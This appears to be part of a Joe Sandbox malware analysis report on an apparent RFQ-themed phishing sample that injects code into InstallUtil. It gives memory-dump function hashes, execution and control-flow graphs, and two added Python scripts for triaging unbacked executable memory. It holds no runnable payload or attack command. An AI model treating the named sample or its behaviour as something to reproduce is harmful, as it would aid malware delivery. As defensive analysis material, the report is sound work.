                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Hbq$Xbq$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-2743516598
                                                                                                                                                                                                • Opcode ID: 40199e1e3ae2ad15cd5389475a21891604b5cf966b4f7bbca00195c36cca6ec8
                                                                                                                                                                                                • Instruction ID: cc01799d1e1c19d06b97b5a1964857bcb770f87a23156a3fab38f36a5287a470
                                                                                                                                                                                                • Opcode Fuzzy Hash: 40199e1e3ae2ad15cd5389475a21891604b5cf966b4f7bbca00195c36cca6ec8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 62A18A717082704FD7165B39882463EBFA7EFC161171984AED246CBBD6DE29CC038792
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$@$B$B
                                                                                                                                                                                                • API String ID: 0-685577651
                                                                                                                                                                                                • Opcode ID: 0eb89c6a9c1bb858ffdc51901fe4ab63960defc982117bd701d48daaf0603ea9
                                                                                                                                                                                                • Instruction ID: c9112e94056d5a3333718f2d8b54ac4277d66b1a382a60f5da11f6bed70e55fa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0eb89c6a9c1bb858ffdc51901fe4ab63960defc982117bd701d48daaf0603ea9
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA217C71F006168FCBA4CF69C88486EBBF9EF897507164176E606EB361D730D944CB85
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                                                                                • API String ID: 0-3001612457
                                                                                                                                                                                                • Opcode ID: 0a67be6086ff79eb1dc0344779197497d7486a894bb4f879e1f647c01ceedd10
                                                                                                                                                                                                • Instruction ID: bc2a2c2171392ac38cb77b3c883e12bbfdc903641644494f40fad9c01fc18b59
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a67be6086ff79eb1dc0344779197497d7486a894bb4f879e1f647c01ceedd10
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D0171317101349FCB648E2EC444926B7EBBF89B69B2945AAE606CB3A1DA31DC43C750

Execution Graph

Execution Coverage: 20.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 29%
Total number of Nodes: 31
Total number of Limit Nodes: 7

execution_graph
Nodes (id, address, API or call annotation):
19968 2a3e018
19969 2a3e024
19972 6692968
19973 669298a
19974 2a3e0c3
19979 6699548
19987 669992c
19993 6699318
20002 6699328
19980 669954d LdrInitializeThunk
19986 6699619
19982 66996d9
19983 6699924 LdrInitializeThunk
19985 6699328 2 API calls
19992 66997e3
19989 6699924 LdrInitializeThunk
19990 6699a81
19991 6699328 2 API calls
19994 669933a
19995 669933f
19996 669957e LdrInitializeThunk
20001 6699619
19997 66996d9
19998 6699924 LdrInitializeThunk
20000 6699328 2 API calls
20003 669933a
20004 669933f
20005 669957e LdrInitializeThunk
20008 6699619
20006 66996d9
20007 6699a69 LdrInitializeThunk
Edges (source -> targets):
19968 -> 19969
19969 -> 19972
19972 -> 19973
19973 -> 19974, 19979, 19987, 19993, 20002
19979 -> 19980
19980 -> 19986
19982 -> 19974
19983 -> 19982
19985 -> 19986
19986 -> 19982, 19983, 19985
19987 -> 19992
19989 -> 19990
19990 -> 19974
19991 -> 19992
19992 -> 19989, 19991
19993 -> 19994, 19995
19994 -> 19974
19995 -> 19994, 19996
19996 -> 20001
19997 -> 19974
19998 -> 19997
20000 -> 20001
20001 -> 19997, 19998, 20000
20002 -> 20003, 20004
20003 -> 19974
20004 -> 20003, 20005
20005 -> 20008
20006 -> 19974
20007 -> 20006
20008 -> 20006, 20007

Control-flow Graph

• Executed
• Not Executed
control_flow_graph
Basic blocks (id, address range, annotation):
1711 6699548-6699577
1713 6699579
1714 669957e-6699614 LdrInitializeThunk
1715 66996b3-66996b9
1716 6699619-669962c
1717 66996bf-66996d7
1718 669962e
1719 6699633-6699684
1720 66996d9-66996e6
1721 66996eb-66996fe
1738 6699697-66996a9
1739 6699686-6699694
1722 6699a81-6699b7e
1723 6699700
1724 6699705-6699721
1729 6699b80-6699b85
1730 6699b86-6699b90
1726 6699728-669974c
1727 6699723
1733 669974e
1734 6699753-6699785
1743 669978c-66997ce
1744 6699787
1740 66996ab
1741 66996b0
1746 66997d0
1747 66997d5-66997de
1748 6699a06-6699a0c
1749 66997e3-6699808
1750 6699a12-6699a25
1753 669980a
1754 669980f-6699846
1751 6699a2c-6699a47
1752 6699a27
1755 6699a49
1756 6699a4e-6699a62
1762 6699848
1763 669984d-669987f
1760 6699a69-6699a7f LdrInitializeThunk
1761 6699a64
1765 6699881-66998a6
1766 66998e3-66998f6
1769 66998a8
1770 66998ad-66998db
1767 66998f8
1768 66998fd-6699922
1773 6699931-6699969
1774 6699924-6699925
1775 669996b
1776 6699970-66999d1 call 6699328
1782 66999d8-66999fc
1783 66999d3
1786 66999fe
1787 6699a03
Edges (source -> targets):
1711 -> 1713, 1714
1713 -> 1714
1714 -> 1715
1715 -> 1716, 1717
1716 -> 1718, 1719
1717 -> 1720, 1721
1718 -> 1719
1719 -> 1738, 1739
1720 -> 1722
1721 -> 1723, 1724
1722 -> 1729, 1730
1723 -> 1724
1724 -> 1726, 1727
1726 -> 1733, 1734
1727 -> 1726
1729 -> 1730
1733 -> 1734
1734 -> 1743, 1744
1738 -> 1740, 1741
1739 -> 1717
1740 -> 1741
1741 -> 1715
1743 -> 1746, 1747
1744 -> 1743
1746 -> 1747
1747 -> 1748
1748 -> 1749, 1750
1749 -> 1753, 1754
1750 -> 1751, 1752
1751 -> 1755, 1756
1752 -> 1751
1753 -> 1754
1754 -> 1762, 1763
1755 -> 1756
1756 -> 1760, 1761
1760 -> 1722
1761 -> 1760
1762 -> 1763
1763 -> 1765, 1766
1765 -> 1769, 1770
1766 -> 1767, 1768
1767 -> 1768
1768 -> 1773, 1774
1769 -> 1770
1770 -> 1766
1773 -> 1775, 1776
1775 -> 1776
1776 -> 1782, 1783
1782 -> 1786, 1787
1783 -> 1782
1786 -> 1787
1787 -> 1748
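The execution graph and the control-flow graph above are emitted by the report as a single whitespace-separated token stream: node definitions (an id followed by an address or a start-end range, optionally followed by an annotation such as LdrInitializeThunk, 2 API calls or call 6699328) interleaved with src->dst edges. The Python below is an added example written for this page, not code from the Joe Sandbox report or its tooling. It quotes the execution graph verbatim plus a short excerpt of the control-flow graph, parses the stream (the grammar is inferred from the two dumps on this page, which is an assumption), and answers the two questions an analyst usually has about such a graph: which code addresses carry a given API call, and what the shortest path is from the entry node (19968, address 2a3e018) to the first such call. The function names parse_graph, api_nodes, addresses_calling and shortest_path are the example's own.

```python
"""Parse the flattened graph dumps of a Joe Sandbox report and query them.
Added example, not part of the report. Grammar inferred from this page's dumps
(assumption): node = '<id> <addr>' or '<id> <start>-<end>' plus optional annotation
tokens ('LdrInitializeThunk', '2 API calls', 'call <addr>'); edge = '<a>-><b>'."""
import re
from collections import deque

# Quoted verbatim from the Execution Graph above (process 5, InstallUtil, dump at 0x6690000).
EXECUTION_GRAPH = (
    "execution_graph 19968 2a3e018 19969 2a3e024 19968->19969 19972 6692968 19969->19972 "
    "19973 669298a 19972->19973 19974 2a3e0c3 19973->19974 19979 6699548 19973->19979 "
    "19987 669992c 19973->19987 19993 6699318 19973->19993 20002 6699328 19973->20002 "
    "19980 669954d LdrInitializeThunk 19979->19980 19986 6699619 19980->19986 "
    "19982 66996d9 19982->19974 19983 6699924 LdrInitializeThunk 19983->19982 "
    "19985 6699328 2 API calls 19985->19986 19986->19982 19986->19983 19986->19985 "
    "19992 66997e3 19987->19992 19989 6699924 LdrInitializeThunk 19990 6699a81 19989->19990 "
    "19990->19974 19991 6699328 2 API calls 19991->19992 19992->19989 19992->19991 "
    "19994 669933a 19993->19994 19995 669933f 19993->19995 19994->19974 19995->19994 "
    "19996 669957e LdrInitializeThunk 19995->19996 20001 6699619 19996->20001 "
    "19997 66996d9 19997->19974 19998 6699924 LdrInitializeThunk 19998->19997 "
    "20000 6699328 2 API calls 20000->20001 20001->19997 20001->19998 20001->20000 "
    "20003 669933a 20002->20003 20004 669933f 20002->20004 20003->19974 20004->20003 "
    "20005 669957e LdrInitializeThunk 20004->20005 20008 6699619 20005->20008 "
    "20006 66996d9 20006->19974 20007 6699a69 LdrInitializeThunk 20007->20006 20008->20006 20008->20007"
)

# Excerpt (not the whole dump) of the Control-flow Graph above for the function at 0x6699548:
# its first four blocks plus the block calling 0x6699328. Edges naming blocks outside the
# excerpt (1773, 1775) are kept as dangling references.
CFG_EXCERPT = (
    "control_flow_graph 1711 6699548-6699577 1713 6699579 1711->1713 "
    "1714 669957e-6699614 LdrInitializeThunk 1711->1714 1713->1714 1715 66996b3-66996b9 1714->1715 "
    "1776 6699970-66999d1 call 6699328 1773->1776 1775->1776 1782 66999d8-66999fc 1776->1782"
)

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")  # 'addr' or 'start-end'
EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_graph(dump):
    """Return (name, nodes, edges): nodes = {id: {'addr', 'note'}}, edges = [(src, dst)]."""
    tokens = dump.split()
    name, nodes, edges, current, i = None, {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # A decimal id followed by an address-like token opens a new node.
        if NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": tokens[i + 1], "note": ""}
            i += 2
            continue
        if current is None:  # leading graph name, e.g. 'execution_graph'
            name = tok
            i += 1
            continue
        if tok == "call" and i + 1 < len(tokens):  # keep 'call <addr>' as one annotation
            tok = "call " + tokens[i + 1]
            i += 1
        nodes[current]["note"] = (nodes[current]["note"] + " " + tok).strip()
        i += 1
    return name, nodes, edges


def api_nodes(nodes, api):
    """Ids of nodes whose annotation names `api`, e.g. 'LdrInitializeThunk'."""
    return sorted(n for n, v in nodes.items() if api in v["note"].split())


def addresses_calling(nodes, api):
    """Distinct code addresses (or block ranges) annotated with `api`."""
    return sorted({v["addr"] for v in nodes.values() if api in v["note"].split()})


def shortest_path(nodes, edges, start, is_target):
    """BFS from `start`; shortest path (list of ids) to the first node satisfying
    is_target(id), or None when no such node is reachable."""
    succ = {n: [] for n in nodes}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
    prev, queue = {start: None}, deque([start])
    while queue:
        n = queue.popleft()
        if is_target(n):
            path = []
            while n is not None:
                path.append(n)
                n = prev[n]
            return path[::-1]
        for d in succ.get(n, []):
            if d not in prev:
                prev[d] = n
                queue.append(d)
    return None


if __name__ == "__main__":
    _, nodes, edges = parse_graph(EXECUTION_GRAPH)
    hit = lambda n: "LdrInitializeThunk" in nodes.get(n, {}).get("note", "")
    print(len(nodes), "nodes,", len(edges), "edges")
    print("LdrInitializeThunk sites:", addresses_calling(nodes, "LdrInitializeThunk"))
    print("entry 2a3e018 to first API call:", shortest_path(nodes, edges, 19968, hit))
```

Run as a script it prints the node and edge counts, the four distinct addresses annotated LdrInitializeThunk (669954d, 669957e, 6699924, 6699a69) and the entry-to-API path 19968, 19969, 19972, 19973, 19979, 19980. The 31 parsed nodes equal the Total number of Nodes stated above, which is a cheap check that the parser consumed every token of the dump.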
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                • Opcode ID: 4cc4fdd0ed5ed4b4a4f16e1d259b4c11c978a8a08256ae249a55247f2f927b80
                                                                                                                                                                                                • Instruction ID: 7f61626e76caf6bbd1e9fc0858ae14768c68b10d5ad29846d8803721351308b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cc4fdd0ed5ed4b4a4f16e1d259b4c11c978a8a08256ae249a55247f2f927b80
                                                                                                                                                                                                • Instruction Fuzzy Hash: AFF1F774D01218CFDB54DFA9C884B9DBBB6BF88304F14C2A9E808AB355DB75A985CF50
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                • Opcode ID: 63a08f2154ade6b07c485d2637584af5f161d78eca48c86663b33901ce8ccd41
                                                                                                                                                                                                • Instruction ID: baea70767457a41afdaabfea136132e0d73a2546f1dc0ec92c19f7dfe77c90d9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 63a08f2154ade6b07c485d2637584af5f161d78eca48c86663b33901ce8ccd41
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C91C571E006188BDF55DFBAC9546ADBEF6AF85310F18862DD815AB390DB344D02CBA1
Memory Dump Source
• Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 853c69d06cf0d038ad36be5d998bd4d4e75da59ef887e6a45665d152216509a5
• Instruction ID: 0c839dc48013f7db1badbacb058c7ea974381afb59a3eb26904458dc21824dee
• Opcode Fuzzy Hash: 853c69d06cf0d038ad36be5d998bd4d4e75da59ef887e6a45665d152216509a5
• Instruction Fuzzy Hash: 4472CF74E012298FDB64DF69C994BE9BBB2BB49304F2481E9D80DA7355DB309E81CF50

Memory Dump Source
• Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 49c905f819ee55e3e6bd19d168907caf818f18b30777b2eda0b3063621c48957
• Instruction ID: 4743680795bcacc48e751729afa20bfda28af80d71803d343cff2bc4d8bad6a6
• Opcode Fuzzy Hash: 49c905f819ee55e3e6bd19d168907caf818f18b30777b2eda0b3063621c48957
• Instruction Fuzzy Hash: ADC1D278E00258CFDB54DFA9C994B9DBBB2BF88305F1081A9E809AB354DB345E81CF10

APIs
• LdrInitializeThunk.NTDLL(00000000), ref: 06699A6E
Memory Dump Source
• Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b53924f8af3b3b1c77d969f35651b9c55cf9d540493b904c75acffef512a37a3
• Instruction ID: 4ce3999a6d6d0f01816a6b8f585e83261856743929ced30ef40a8c57d88b7d05
• Opcode Fuzzy Hash: b53924f8af3b3b1c77d969f35651b9c55cf9d540493b904c75acffef512a37a3
• Instruction Fuzzy Hash: 21113A74E011098FDF44DBA9D894AADBBF9FB88314F188269E804AB345DB31E941CB60

Memory Dump Source
• Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 17d47889430f1869d9a3408af621581cb75aafdfe590e9b04db4d63afb49fb85
• Instruction ID: 03878c32cb8d9f8f1d5d4e6a5cb8a099ac6ccbaf07f8654660d1ad56cb2a2ab4
• Opcode Fuzzy Hash: 17d47889430f1869d9a3408af621581cb75aafdfe590e9b04db4d63afb49fb85
• Instruction Fuzzy Hash: 63216A71504204DFCB05DF54D9C0BA6BF65FB9832CF24C56DDA0A0BA56D33AE416C7A1

Memory Dump Source
• Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 497f4f785e04f9b8760a7c9e04fdca785089b7bc92630409e2d79ff61fed98d1
• Instruction ID: 854d55d36cd6111ecd8ab9d6aa77aec4c2b60d43532e96bb349d36d64ecb30b8
• Opcode Fuzzy Hash: 497f4f785e04f9b8760a7c9e04fdca785089b7bc92630409e2d79ff61fed98d1
• Instruction Fuzzy Hash: FB214871504204DFCB05DF58D8C0F66BF65FB8832CF20C569EA090BA46D336D416CBA1

Memory Dump Source
• Source File: 00000005.00000002.2990294019.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_29ed000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 648008beee6d7a7dfeff7325041cd28a8d7da5bcf44cf22bc43f6b35fd3adb1b
• Instruction ID: 560b37d3eec6ab5e46e06801b2e343f2527e1921959d22f48fcc9a6e7e28cfe8
• Opcode Fuzzy Hash: 648008beee6d7a7dfeff7325041cd28a8d7da5bcf44cf22bc43f6b35fd3adb1b
• Instruction Fuzzy Hash: 1021F5716042049FDF16DF14C9C4B26BBA9FB84315F28C96DE84B4B381C736D446CA71

Memory Dump Source
• Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction ID: 32c119eaf40e8e633d6925f650b7a9d23dc64e994d8cf106b44d1e72106b1791
• Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction Fuzzy Hash: 08110376504240CFCB02CF54D5C4B56BF72FB84328F24C5AAD90A0B657C336D45ACBA2

Memory Dump Source
• Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction ID: c0f7d900dc74acbb05c50f3d3c7d587982c0c361bdedb24e0bc1af3bcb1eac28
• Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction Fuzzy Hash: B4110376904280CFCB06CF44D5C4B56BF72FB84328F24C5A9D9090B657C33AD45ACBA2

Memory Dump Source
• Source File: 00000005.00000002.2990294019.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_29ed000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
• Instruction ID: d15d135d83613b834d51f87cd967aa95b7431331d2c8960d037c2863330e3219
• Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
• Instruction Fuzzy Hash: 5B11BB75504284CFCB16CF10C9C4B15BBA6FB88324F28C6A9D84A4B292C33AD44ACB62
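The function records above are easier to triage once parsed: every one of them comes from a memory region the sandbox could not map to a PE image ("based on PE: false"), one references LdrInitializeThunk from the 06690000 region, and two records share an Opcode ID while differing in Instruction ID, which means the same mnemonic sequence appears with different operands (typically the same routine at a different address). The following script is an added example, not Joe Sandbox code, that parses records in this layout, groups them by dump, and reports those observations. Its sample input is four records copied from the listing above. The decoding of the fifth dotted field of the `.sdmp` name as a Win32 `PAGE_*` protection constant (0x40 being PAGE_EXECUTE_READWRITE) is an assumption about the dump naming scheme, not something the report states; the other fields are passed through raw.

```python
import re
from collections import defaultdict

# Constructed sample: four records copied from the function listing above.
SAMPLE = """\
APIs
• LdrInitializeThunk.NTDLL(00000000), ref: 06699A6E
Memory Dump Source
• Source File: 00000005.00000002.2998472117.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6690000_InstallUtil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b53924f8af3b3b1c77d969f35651b9c55cf9d540493b904c75acffef512a37a3
• Instruction ID: 4ce3999a6d6d0f01816a6b8f585e83261856743929ced30ef40a8c57d88b7d05
• Opcode Fuzzy Hash: b53924f8af3b3b1c77d969f35651b9c55cf9d540493b904c75acffef512a37a3
• Instruction Fuzzy Hash: 21113A74E011098FDF44DBA9D894AADBBF9FB88314F188269E804AB345DB31E941CB60
Memory Dump Source
• Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction ID: 32c119eaf40e8e633d6925f650b7a9d23dc64e994d8cf106b44d1e72106b1791
• Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction Fuzzy Hash: 08110376504240CFCB02CF54D5C4B56BF72FB84328F24C5AAD90A0B657C336D45ACBA2
Memory Dump Source
• Source File: 00000005.00000002.2990170808.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13bd000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction ID: c0f7d900dc74acbb05c50f3d3c7d587982c0c361bdedb24e0bc1af3bcb1eac28
• Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction Fuzzy Hash: B4110376904280CFCB06CF44D5C4B56BF72FB84328F24C5A9D9090B657C33AD45ACBA2
Memory Dump Source
• Source File: 00000005.00000002.2990294019.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_29ed000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
• Instruction ID: d15d135d83613b834d51f87cd967aa95b7431331d2c8960d037c2863330e3219
• Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
• Instruction Fuzzy Hash: 5B11BB75504284CFCB16CF10C9C4B15BBA6FB88324F28C6A9D84A4B292C33AD44ACB62
"""

HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
SOURCE_RE = re.compile(
    r"(?P<name>[0-9A-Fa-f.]+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
# ASSUMPTION: the fifth dotted field of the .sdmp name is a Win32 PAGE_* constant.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def parse_records(text):
    """Split the listing into one dict per function; a record ends at its Instruction Fuzzy Hash."""
    records, cur, section = [], {"apis": []}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            section = line
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":           # API reference lines carry no key/value layout
            cur["apis"].append(body)
            continue
        key, _, value = body.partition(":")
        cur[key.strip()] = value.strip()
        if key.strip() == "Instruction Fuzzy Hash":
            records.append(cur)
            cur, section = {"apis": []}, None
    return records


def parse_source(value):
    """Decode a 'Source File' value: dump name, base, offset, PE-backed flag, assumed protection."""
    m = SOURCE_RE.fullmatch(value)
    if not m:
        raise ValueError("unrecognised Source File: %r" % value)
    fields = m["name"][:-len(".sdmp")].split(".")
    protect = int(fields[4], 16)
    return {"dump": m["name"], "base": int(fields[3], 16), "offset": int(m["offset"], 16),
            "pe_backed": m["pe"] == "true", "protect": protect,
            "protect_name": PAGE_PROTECT.get(protect, "unknown(0x%x)" % protect),
            "raw_fields": fields}


def shared_opcode_ids(records):
    """Opcode IDs seen with more than one Instruction ID: same mnemonics, different operands."""
    seen = defaultdict(set)
    for r in records:
        seen[r["Opcode ID"]].add(r["Instruction ID"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def triage(text):
    records = parse_records(text)
    by_dump = defaultdict(list)
    for r in records:
        r["source"] = parse_source(r["Source File"])
        by_dump[r["source"]["dump"]].append(r)
    # Functions in executable+writable memory with no backing PE are the injected-code candidates.
    unbacked_rwx = [r for r in records
                    if r["source"]["protect"] == 0x40 and not r["source"]["pe_backed"]]
    with_apis = [r for r in records if r["apis"]]
    return {"records": records, "by_dump": dict(by_dump), "unbacked_rwx": unbacked_rwx,
            "with_apis": with_apis, "shared_opcodes": shared_opcode_ids(records)}


if __name__ == "__main__":
    result = triage(SAMPLE)
    for dump, recs in result["by_dump"].items():
        print("%s: %d function(s), %s" % (dump, len(recs), recs[0]["source"]["protect_name"]))
    for r in result["with_apis"]:
        print("API refs at base %08X: %s" % (r["source"]["base"], ", ".join(r["apis"])))
    for op, ids in result["shared_opcodes"].items():
        print("Opcode ID %s... seen with %d Instruction IDs" % (op[:16], len(ids)))
```

Run against the full listing rather than the sample, the `shared_opcodes` output is the quickest way to spot relocated copies of the same routine across the 013BD000, 029ED000 and 06690000 regions; the `with_apis` list narrows down which of those functions actually touch ntdll exports.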